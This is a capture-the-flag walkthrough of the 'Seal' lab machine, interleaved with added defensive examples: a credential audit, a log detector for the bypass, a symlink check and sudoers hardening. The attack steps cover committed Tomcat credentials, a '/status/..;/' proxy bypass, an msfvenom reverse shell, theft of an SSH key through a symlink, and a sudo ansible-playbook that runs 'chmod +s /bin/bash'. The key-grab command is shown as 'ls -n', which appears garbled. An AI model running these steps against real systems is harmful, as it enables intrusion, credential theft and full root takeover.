In this post, I would like to share a walkthrough of the Seal Machine.
This machine has been rated as medium difficulty.
Information Gathering on Seal Machine
Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -Pn
# Nmap 7.91 scan initiated Mon Jul 12 21:30:43 2021 as: nmap -sC -sV -oA intial -Pn 10.10.10.250
Nmap scan report for seal.htb (10.10.10.250)
Host is up (0.22s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
|   256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_  256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp  open  ssl/http   nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Seal Market
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after:  2022-05-05T10:24:03
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|_  http/1.1
8080/tcp open  http-proxy
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 401 Unauthorized
|     Date: Tue, 13 Jul 2021 01:44:48 GMT
|     Set-Cookie: JSESSIONID=node0hnabifqaxoy718gb842iywilt193.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   GetRequest:
|     HTTP/1.1 401 Unauthorized
|     Date: Tue, 13 Jul 2021 01:44:46 GMT
|     Set-Cookie: JSESSIONID=node0ba5l1frprgu2fwdfykhazky6191.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Tue, 13 Jul 2021 01:44:47 GMT
|     Set-Cookie: JSESSIONID=node016ot8bocmvot7y8baiml78ulf192.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Allow: GET,HEAD,POST,OPTIONS
|     Content-Length: 0
|   RPCCheck:
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest:
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   Socks4:
|     HTTP/1.1 400 Illegal character CNTL=0x4
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
|   Socks5:
|     HTTP/1.1 400 Illegal character CNTL=0x5
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[raw service fingerprint omitted]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 12 21:32:32 2021 -- 1 IP address (1 host up) scanned in 109.27 seconds
We need to add the machine's domain name, seal.htb, to our hosts file.
Let's open the browser and go straight to the website.
We didn't see any useful information on the website.
Let's access the website via port 8080; the interface will look like the screenshot above.
There's a "create one" link that lets us create a new account.
Gaining Privileged Access on Seal Machine
Finally, we have managed to log into the Dashboard, whose interface looks as shown above.
From the main website earlier, we noticed that the web title is "Seal Market".
Opening the Seal Market App repository shows that the developer has made 13 commits to the application.
Without further ado, let's open the commits page and look at its content.
I analyzed the commits shown here, and one entry (its hash starts with ac210325af) stood out from the rest.
I found a tomcat folder within the commit we opened previously.
There should be a configuration file saved as tomcat-users.xml, which might contain the username and password for the website.
Finally, the username and password are revealed in the tomcat-users.xml configuration.
From the Tomcat configuration, we notice a manager-gui role, which suggests a /manager/ directory. Let's access it with the credentials we found previously.
As a result, we managed to gain access to the Tomcat Web Application Manager. A malicious file will need to be uploaded through the web interface for the next step.
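The check that would have caught this before the push, as an added example (not the post's or the project's code): a small audit of tomcat-users.xml that flags plaintext or empty passwords and users holding manager/admin roles. The sample XML is constructed; in practice you would run it over each revision in the repository's history, since credentials removed in a later commit are still recoverable from earlier ones.

```python
"""Audit a tomcat-users.xml for committed credentials and over-privileged roles.
Added example, not code from the original post. The sample XML is constructed
and does not reproduce the credentials found on the machine."""
import xml.etree.ElementTree as ET

# Roles that grant deploy/undeploy control over the Tomcat instance.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "admin-gui", "admin-script"}

SAMPLE_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="PLACEHOLDER_PLAINTEXT" roles="manager-gui,admin-gui"/>
  <user username="monitor" password="a1b2c3$10000$deadbeef" roles="manager-status"/>
  <user username="guest" password="" roles=""/>
</tomcat-users>
"""

def _local(tag):
    """Strip a namespace prefix like {http://tomcat.apache.org/xml}user."""
    return tag.rsplit("}", 1)[-1]

def audit_tomcat_users(xml_text):
    """Return (username, issue) pairs a reviewer should block before merge."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username", "?")
        password = el.get("password")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if password == "":
            findings.append((name, "empty password"))
        elif password is not None and "$" not in password:
            # Heuristic: Tomcat's salted digests are written as salt$iterations$hexdigest.
            # Anything without '$' is treated as plaintext here (an unsalted bare-hex
            # digest would also be flagged and needs a human look).
            findings.append((name, "plaintext password"))
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if privileged:
            findings.append((name, "privileged roles: " + ", ".join(privileged)))
    return findings

if __name__ == "__main__":
    for user, issue in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{user}: {issue}")
```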
However, we need to start our nc listener after we create the malicious file on our machine, in order to catch the reverse shell.
The upload process will look something like the screenshot above.
We should intercept the request in Burp Suite Community after clicking the deploy button.
We need to modify the request by inserting /status/..;/ between the manager directory and html. Next, we click the forward button to send the request to the server.
As a result, the file has been saved successfully, as shown in the screenshot above. To obtain the connection back to us, we need to click on the file (the same file we created with msfvenom).
When we look back at the reverse shell terminal, the connection has come back to us.
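What this bypass looks like from the defender's side, as an added example (not code from the post): the reverse proxy compared the raw request string against its protected location, while Tomcat strips ;path-parameters per segment and resolves .. before mapping, so the two disagree about which resource was served. The log lines are constructed in nginx combined format, and the proxy is assumed to gate /manager/html, as the post's bypass path implies.

```python
"""Detect reverse-proxy ACL bypass via Tomcat path parameters (the /..;/ trick).
Added example, not code from the original post. Log lines are constructed in nginx
combined format; the proxy is assumed to gate /manager/html, as the post's bypass implies."""
import re
from urllib.parse import unquote

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})')
PROTECTED = ("/manager/html", "/host-manager/html")   # locations the proxy restricts

SAMPLE_LOG = """\
10.10.14.5 - - [12/Jul/2021:21:40:01 -0400] "GET /manager/html HTTP/1.1" 403 153 "-" "curl/7.74.0"
10.10.14.5 - - [12/Jul/2021:21:40:09 -0400] "GET /manager/status/..;/html HTTP/1.1" 200 18932 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Jul/2021:21:40:30 -0400] "POST /manager/status/..;/html/upload?nonce=X HTTP/1.1" 200 2100 "-" "Mozilla/5.0"
10.10.14.9 - - [12/Jul/2021:21:41:00 -0400] "GET /manager/status;jsessionid=abc HTTP/1.1" 200 500 "-" "Mozilla/5.0"
10.10.14.9 - - [12/Jul/2021:21:41:10 -0400] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

def normalize_tomcat_path(uri):
    """Map a URI the way Tomcat does: drop ';param' per segment, then collapse '.' and '..'."""
    out = []
    for seg in unquote(uri.split("?", 1)[0]).split("/"):
        seg = seg.split(";", 1)[0]          # ;jsessionid=... and friends are not part of the path
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()                   # '/manager/status/..;/html' collapses to '/manager/html'
        else:
            out.append(seg)
    return "/" + "/".join(out)

def is_protected(path):
    return any(path == p or path.startswith(p + "/") for p in PROTECTED)

def find_bypass_attempts(log_text):
    """Return (ip, raw_uri, tomcat_path) where the raw URI passed the proxy's string check
    but the path Tomcat actually serves is under a protected location."""
    hits = []
    for m in filter(None, map(LOG_RE.match, log_text.splitlines())):
        raw = unquote(m.group("uri").split("?", 1)[0])
        norm = normalize_tomcat_path(m.group("uri"))
        if is_protected(norm) and not is_protected(raw):
            hits.append((m.group("ip"), m.group("uri"), norm))
    return hits
```

The durable fix is to stop relying on string prefixes at the proxy: terminate the Manager application's access control inside Tomcat (or remove the Manager app from an Internet-facing instance) rather than in front of it.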
Maintaining Privileged Access
Let's see which directory we have access to.
We need to look at the /opt/backups/ directory, where we spot a playbook directory.
Let's read the content stored in the run.yml file.
We found a directory that we can use for further escalation to obtain the user flag.
No files are stored in the uploads directory.
Without further ado, we should be able to retrieve luis's key by executing the command "ls -n /home/luis/.ssh/id_rsa /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads".
In the end, we got id_rsa in the uploads directory, but it is unreadable there. Because of that, we move the file into the /tmp directory.
After that, we can copy the id_rsa to our attacking machine, from which we will be able to access the machine via the SSH service.
Before we can log into the machine via SSH, we need to set the permissions of id_rsa to 600.
We can read the user flag by executing the command "cat user.txt".
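The root cause here is a privileged backup job copying a directory that a lower-privileged service can write to, following whatever symlinks it finds. As an added example (not the playbook from the post), a pre-flight check such a job should run before copying: it walks the source tree without following links and refuses any symlink whose target resolves outside the tree. The tree is constructed in a temporary directory; "outside/id_rsa" is a placeholder standing in for a user's key.

```python
"""Pre-flight check for a privileged backup job: refuse symlinks that escape the source tree.
Added example, not the playbook from the original post. The tree is constructed in a temp
directory to mirror a web-app uploads folder; outside/id_rsa stands in for a user's key."""
import os
import tempfile

def escaping_symlinks(src_root):
    """Return (link, target) for every symlink under src_root that resolves outside it.
    A root-run copy that follows such a link backs up files the folder's owner
    could never read, which is the id_rsa case described above."""
    root = os.path.realpath(src_root)
    offenders = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:      # symlinks to directories show up in dirnames
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                target = os.path.realpath(full)
                if os.path.commonpath([root, target]) != root:
                    offenders.append((full, target))
    return offenders

def build_demo_tree():
    """Construct an uploads folder with one in-tree link and one escaping link."""
    base = tempfile.mkdtemp()
    uploads = os.path.join(base, "uploads")
    os.makedirs(uploads)
    with open(os.path.join(uploads, "report.pdf"), "w") as f:
        f.write("constructed sample upload\n")
    os.symlink("report.pdf", os.path.join(uploads, "copy_of_report"))   # stays inside the tree
    secret = os.path.join(base, "outside", "id_rsa")                    # placeholder, not a real key
    os.makedirs(os.path.dirname(secret))
    with open(secret, "w") as f:
        f.write("PLACEHOLDER PRIVATE KEY\n")
    os.symlink(secret, os.path.join(uploads, "id_rsa"))                 # escapes the tree
    return uploads

if __name__ == "__main__":
    for link, target in escaping_symlinks(build_demo_tree()):
        print(f"REFUSE backup: {link} -> {target}")
```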
Escalating to Root Privileges
By running the sudo -l command, we can see which commands we are allowed to run as root. We can abuse the ansible-playbook entry, which runs as root.
We need to create a file (anyname.yml) containing the following:
    - hosts: localhost
      tasks:
        - name: darknite
          command: "chmod +s /bin/bash"
In order to get root privileges, we execute the command "sudo /usr/bin/ansible-playbook anyname.yml".
Voila! We have obtained root privileges on the machine.
We can read the root flag by executing the "cat root.txt" command.
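The sudo rule that makes this possible, and the shape of a tighter one, as an added configuration example (assumed; the post does not show the actual sudoers entry, and the playbook path is taken from the /opt/backups/playbook/run.yml mentioned above):

```text
# Weak: luis may run ansible-playbook as root with any arguments, so any
# user-written playbook executes as root (the entry the post abuses).
luis ALL=(root) NOPASSWD: /usr/bin/ansible-playbook

# Tighter: sudoers matches arguments literally, so only this exact invocation
# is allowed. The playbook file and its directory must be root-owned and not
# writable by luis, and the playbook itself must not include files luis controls,
# or the pinned path buys nothing.
luis ALL=(root) NOPASSWD: /usr/bin/ansible-playbook /opt/backups/playbook/run.yml
```

Even the tighter rule is only as strong as the ownership and contents of what it points at; sudo -l from a low-privileged shell is the quickest way to review such entries on a host.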